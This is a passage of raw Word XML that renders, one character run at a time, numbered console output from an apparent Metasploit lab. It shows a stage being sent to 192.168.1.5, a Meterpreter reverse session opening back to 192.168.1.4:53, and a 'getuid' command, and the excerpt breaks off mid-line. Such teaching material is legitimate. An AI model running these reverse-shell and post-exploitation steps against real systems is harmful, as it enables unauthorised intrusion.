        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>53</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Sending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="dc4867"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>stage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>206403</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>bytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="136" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1429" w:firstLine="-15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="dc4867"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>opened</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>53</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>13220</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2019</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>52</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0500</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="122" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
